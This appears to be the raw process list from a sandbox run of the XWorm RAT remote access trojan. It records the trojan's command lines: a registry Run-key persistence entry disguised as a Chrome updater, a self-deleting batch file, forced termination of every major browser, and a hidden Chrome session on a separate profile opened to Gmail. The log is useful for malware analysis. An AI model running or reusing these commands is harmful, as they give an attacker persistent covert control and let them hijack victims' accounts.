"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3332 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2976 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4620 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 1908"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2132"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM brave.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM firefox.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM opera.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1556 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3216 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4560 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5176 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1564 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" " https://mail.google.com" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1720 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1920 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1984 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --first-renderer-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2672 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2700 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4080 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4200 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4244 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4588 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4600 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4616 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Guna.UI2.dll"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C5312488AE7951256FD535A170B923D --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
